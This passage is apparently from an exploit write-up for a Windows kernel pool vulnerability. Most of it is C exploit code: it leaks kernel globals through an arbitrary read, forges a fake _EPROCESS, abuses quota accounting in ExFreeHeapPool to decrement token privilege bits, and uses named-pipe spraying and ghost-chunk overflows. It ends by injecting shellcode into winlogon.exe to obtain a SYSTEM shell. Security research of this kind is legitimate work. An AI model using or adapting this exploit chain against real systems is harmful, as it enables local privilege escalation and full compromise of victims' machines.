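static uint64_t find_rip_relative_target(const uint8_t *code, size_t code_len,
                                         uint64_t code_va,
                                         const uint8_t *before, size_t before_len,
                                         const uint8_t *opcode, size_t opcode_len,
                                         const uint8_t *after, size_t after_len)
{
    size_t total = before_len + opcode_len + 4 + after_len;

    assert(code != NULL && before != NULL && opcode != NULL && after != NULL);
    if (code_len < total)
        return 0;

    for (size_t i = 0; i + total <= code_len; i++) {
        const uint8_t *p = code + i;
        const uint8_t *disp_bytes = p + before_len + opcode_len;

        if (memcmp(p, before, before_len) != 0)
            continue;
        if (memcmp(p + before_len, opcode, opcode_len) != 0)
            continue;
        if (memcmp(disp_bytes + 4, after, after_len) != 0)
            continue;

        /* disp32 is little-endian; a little-endian host is assumed here. */
        int32_t disp;
        memcpy(&disp, disp_bytes, sizeof(disp));

        /* RIP-relative operands are relative to the next instruction. */
        uint64_t next_insn = code_va + i + before_len + opcode_len + 4;
        return next_insn + (uint64_t)(int64_t)disp;
    }
    return 0;
}
```

The same routine covers both shapes that appear in the original code: a one-byte opcode such as the E8 call, and three-byte opcode prefixes such as 48 33 1D for the RIP-relative xor. In the exploit itself the bytes would have to be fetched with the arbitrary read primitive before being compared.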
/* PsInitialSystemProcess - npfs imported ExAllocatePoolWithQuotaTag+0x36
 * ExpPoolQuotaCookie - npfs imported ExAllocatePoolWithQuotaTag+0x90
 * RtlpHpHeapGlobals - npfs imported ExFreeHeapPool+{0xC2,0xBD}: {20Hx,190x} */
BOOL find_nt_variables(UINT64 npfs_base_addr) {
    UINT64 ExAllocatePoolWithQuotaTag, ExFreePoolWithTag, ExFreeHeapPool;
    UINT64 ExAllocatePoolWithQuotaTag_ptr, ExFreePoolWithTag_ptr;

    ExFreePoolWithTag_ptr = npfs_base_addr + off_Npfs_ExFreePoolWithTag;
    ExAllocatePoolWithQuotaTag_ptr = npfs_base_addr + off_Npfs_ExAllocatePoolWithQuotaTag;
    ExAllocatePoolWithQuotaTag = arb_read(ExAllocatePoolWithQuotaTag_ptr, 0x8);
    ExFreePoolWithTag = arb_read(ExFreePoolWithTag_ptr, 0x8);

    /* 48 83 EC 28          sub rsp, 28h
       E8 97 7A CD FF       call ExFreeHeapPool
       48 83 C4 28          add rsp, 28h */
    ExFreeHeapPool = find_address(ExFreePoolWithTag, "\xE8", "\x48\x83\xEC\x28", "\x48\x83\xC4\x28");

    /* 48 8D 04 49          lea rax, [rcx+rcx*2]
       48 33 1D BC 1B 3F 00 xor rbx, cs:RtlpHpHeapGlobals
       48 33 DF             xor rbx, rdi
       48 C1 E0 06          shl rax, 6 */
    RtlpHpHeapGlobals_ptr = find_address(ExFreeHeapPool + 0xBD - 0x10, "\x48\x33\x1D", "\x48\x8D\x04\x49", "\x48\x33\xDF\x48");

    /* 44 0F 44 C9          cmovz r9d, ecx
       48 3B 3D D3 EF A3 00 cmp rdi, cs:PsInitialSystemProcess
       41 8D 69 08          lea ebp, [r9+8] */
    PsInitialSystemProcess_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x32 - 0x10, "\x48\x3B\x3D", "\x44\x0F\x44\xC9", "\x41\x8D\x69\x08");

    /* 49 8D 5F F0          lea rbx, [r15-10h]
       48 8B 15 29 F5 A3 00 mov rdx, cs:ExpPoolQuotaCookie
       45 33 C0             xor r8d, r8d
       48 8B C2             mov rax, rdx */
    ExpPoolQuotaCookie_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x8C - 0x10, "\x48\x8B\x15", "\x49\x8D\x5F\xF0", "\x45\x33\xC0\x48");

    return (RtlpHpHeapGlobals_ptr && PsInitialSystemProcess_ptr && ExpPoolQuotaCookie_ptr);
}

Additionally, we need to find the _EPROCESS pointers of our own process and of winlogon.exe. Since we have already obtained nt!PsInitialSystemProcess, obtaining the process structures and the Token address is a well-documented procedure.

9. Prepare for arbitrary decrements

When the PoolQuota flag is set in the _POOL_HEADER of a VS chunk, ProcessBilled is set to an encoded _EPROCESS pointer, which is used to track the allocation and free statistics of the associated chunk. The QuotaBlock is not well documented and seems to have been updated across different Windows builds, so reversing of the relevant functions and some trial and error are required.

0: kd> dt nt!_EPROCESS 0xffffc50d9fc1d030 QuotaBlock
   +0x568 QuotaBlock : 0xffffb203`c294e0a8 _EPROCESS_QUOTA_BLOCK

When a chunk is freed, the QuotaEntry of the relevant PsQuotaTypes is modified. The arbitrary decrement is based on the subtraction in nt!PspReturnQuota, called from nt!ExFreeHeapPool: the chunk size is subtracted from QuotaEntry[PsNonPagedPool].Usage. Therefore, by crafting an _EPROCESS structure whose QuotaBlock pointer points to a chosen offset inside the Token, we can subtract the chunk size from a QWORD in _TOKEN.Privileges, effectively flipping some bits in the Present and Enabled fields.

__int64 __fastcall ExFreeHeapPool(ULONG_PTR BugCheckParameter2)
{
  // ...
  if ( ChunkAddr & 0xFFF ) // not page aligned
  {
    OriginalHeader = ChunkAddr - 16;
    if ( *(_BYTE *)(ChunkAddr - 13) & 4 ) // test PoolType & CacheAligned
    {
      OriginalHeader -= 16i64 * (unsigned __int8)*(_WORD *)OriginalHeader;
      *(_BYTE *)(OriginalHeader + 3) |= 4u;
    }
    _PoolType = *(unsigned __int8 *)(OriginalHeader + 3);
    _Tag = *(_DWORD *)(OriginalHeader + 4);
    if ( _PoolType & 8 ) // PoolQuota flag: ProcessBilled
    {
      Process = (_BYTE *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8));
      if ( OriginalHeader != (ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) )
      {
        JUMPOUT(Process, 0xFFFF800000000000i64, &BugCheck_C2_466E46);
        JUMPOUT(*Process & 0x7F, 3, &BugCheck_C2_466E46);
        if ( Process != (_BYTE *)PsInitialSystemProcess )
        {
          PspReturnQuota(
            *(char **)((OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) + 0x568),
            (_EPROCESS *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)),
            _PoolType & 1,
            16i64 * (unsigned __int8)*(_WORD *)(OriginalHeader + 2));
          Tag = *(unsigned int *)(OriginalHeader + 4);
        }
        ObDereferenceObjectDeferDeleteWithTag((ULONG_PTR)Process);// EPROCESS
      }
    }
    // ...
}

In this exploit, the PsPoolTypes value happens to be 0 (PsNonPagedPool) and the Usage field is at offset 0 of each EPROCESS_QUOTA_ENTRY, so we simply set the QuotaBlock pointer to the location of the LSB to decrement:

// note the fake _EPROCESS starts at offset 0x70 of each buffer
void setup_fake_eprocess(UINT64 token_addr) {
    char fake_eproc_buf[0x3000] = { 0 };
    copySelfEprocess(fake_eproc_buf, self_eprocess);
    memcpy(fake_eproc_buf+0x1000, fake_eprocess_buf, FAKE_EPROCESS_SIZE);
#ifdef _WINDLL
    memcpy(fake_eproc_buf+0x2000, fake_eprocess_buf, FAKE_EPROCESS_SIZE);
    *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)=token_addr+0x4B; // dec1
    *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)=token_addr+0x44;// dec2
    *(UINT64*)(fake_eproc_buf+0x2070+off_QuotaBlock)=token_addr+0x3D;// dec3
#else
    *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)= token_addr+0x40;// 0x40 Present
    *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)= token_addr+0x48;//0x48 Enabled
#endif
    alloc_fake_eprocess(fake_eprocess_buf, target_pipes, aar_index + 2);
}

The fake _EPROCESS is an exact copy of our own process's structure, obtained through the AAR. Because the initial values in the token differ, the LPE version and the DLL version need different locations, as shown in the code above. To free a chunk such that the QuotaBlock decrement takes effect, we also need to fix the VS chunk header _HEAP_VS_CHUNK_HEADER: we first leak the VS subsegment address VSSubSegmentAddr with find_vs_subsegment, then call fix_vs_header for the target chunk T that we want to free. The previously leaked nt!RtlpHpHeapGlobals is used to derive the HeapKey for encoding the header. The actual _EPROCESS pointer written into ProcessBilled is encoded via encode_ep:

// chunk_addr: address of the _POOL_HEADER
UINT64 encode_ep(UINT64 eproc, UINT64 chunk_addr) {
    return eproc ^ ExpPoolQuotaCookie ^ chunk_addr;
}

10. Perform decrements

We finally perform the decrement. First we invoke the ghost chunk linear pool overflow to write the crafted, encoded ProcessBilled pointer, the correct root queue pointer target_write_queue for the current target chunk T (note that although T stays at the same address, it becomes a new block each time it is reallocated, and therefore has a different root queue pointer), the PoolQuota flag in the pool header, and a fixed VS chunk header. After the overflow we free T to trigger the decrement. For stability, we need to reclaim the chunk T immediately, which also prepares for the next decrement. This is done with rewrite_pipes, and with rewrite2_pipes if a 3rd decrement is needed. Currently we use 0x200 rewrite pipes to reclaim the chunk T reliably. Each time after the rewrite, we invoke the ghost chunk linear pool overflow again to turn T into a leak primitive and search for the correct chunk among the rewrite pipe DQE objects:

rewrite_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'V', 0);  // for final decrement
rewrite2_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'Z', 0); // to fill rewrite_pipes
rewrite3_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'A', 0); // to fill rewrite2_pipes

Taking the 2nd decrement as an example, we first overwrite T so that it becomes a leak primitive (marked as aar2), then use it to confirm that the previous reclaim worked and to locate the new T chunk. With the handle, we can find its original root queue pointer with find_write_queue using the process handle table. Finally we invoke the linear pool overflow again through the ghost chunk to set the new ProcessBilled and mark the chunk as dec2, so that it is ready to be freed to perform the 2nd decrement.
    // enable the arb_read() primitive and restore the target chunk to 0x3E0 bytes
    *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10) = target_pool_hdr; // _POOL_HEADER
    *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08) = 0;               // Clear ProcessBilled
    *(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) = 0x2;         // Clear Quota bit
    fix_vs_header((UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x20),
                  target_page_addr + 0xbe0 - 0x20, 0x3e0);
    *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00) = leak_root_queue; // QE.Flink
    *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08) = leak_root_queue; // QE.Blink
    *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10) = (UINT64)fake_pipe_queue_sub;
    *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20) = 1;               // Unbuffered -> Buffered
    *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x32726161;      // Buf[]: "aar2"
    *(UINT32*)(ghost_pipes->payload+0x00) = 0x324C4747;                 // Mark: "GGL2"
    create_hole_at(ghost_pipes, ghost_idx);  // free ghost chunk
    fill_hole_at(ghost_pipes, ghost_idx);    // rewrite ghost chunk

    current_pipe_offset = 0;
    for (aar_index = 0; aar_index < NUM_REWRITE_PIPES; aar_index ++)
    {
        BYTE buf[0x10] = { 0 };
        if (!peek_data(rewrite_pipes, aar_index, buf, 8))
            exp_failed();
        if ( *(UINT32*)buf != 0x56565656)
        {
            // found overwrite if not 'VVVV'
            aar_pipes = rewrite_pipes;
            _LOG(output, "[+] Rewrite chunk (aar2/dec2) at: index 0x%X, handle 0x%llX\n",
                 aar_index, (UINT64)rewrite_pipes->writePipe[aar_index]);
            break;
        }
    }
    if (aar_index == NUM_REWRITE_PIPES)
    {
        _LOG(output, "[+] First rewrite of 0x3E0 bytes chunks failed.\n");
        exp_failed();
    }

    // find the WriteQueue of the reclaimed rewrite chunk after ghost overwrite to fix it
    find_write_queue(self_eprocess, rewrite_pipes->writePipe[aar_index]);
    *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x00) = target_write_queue; // QE.Flink
    *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x08) = target_write_queue; // QE.Blink
    *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x08) =
        encode_ep(fake_eprocess + 0x1000, target_page_addr + 0xbe0 - 0x10);
    *(UINT8 *) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) |= 0x8;           // Set Quota bit
    *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x10) = 0;                  // Clear Irp buffer
    *(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x20) = 0;                  // Unbuffered
    *(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x32636564;         // Buf[]: "dec2"
    *(UINT32 *)(ghost_pipes->payload+0x00) = 0x32474747;                    // Mark: "GGG2"
    create_hole_at(ghost_pipes, ghost_idx);  // free ghost chunk
    fill_hole_at(ghost_pipes, ghost_idx);    // rewrite ghost chunk

    // perform 2nd decrement (-0x3E0) at Token + 0x48: 0x800000 - 0x3e0 = 0x7ffc20
    create_hole_at(rewrite_pipes, aar_index);
    spray(rewrite2_pipes);

Note that the DQE object has to be switched back to Unbuffered mode before it is freed.

11. Spawn SYSTEM shell

Once we have obtained SeDebugPrivilege, we can inject shellcode into winlogon.exe to spawn a SYSTEM shell.

References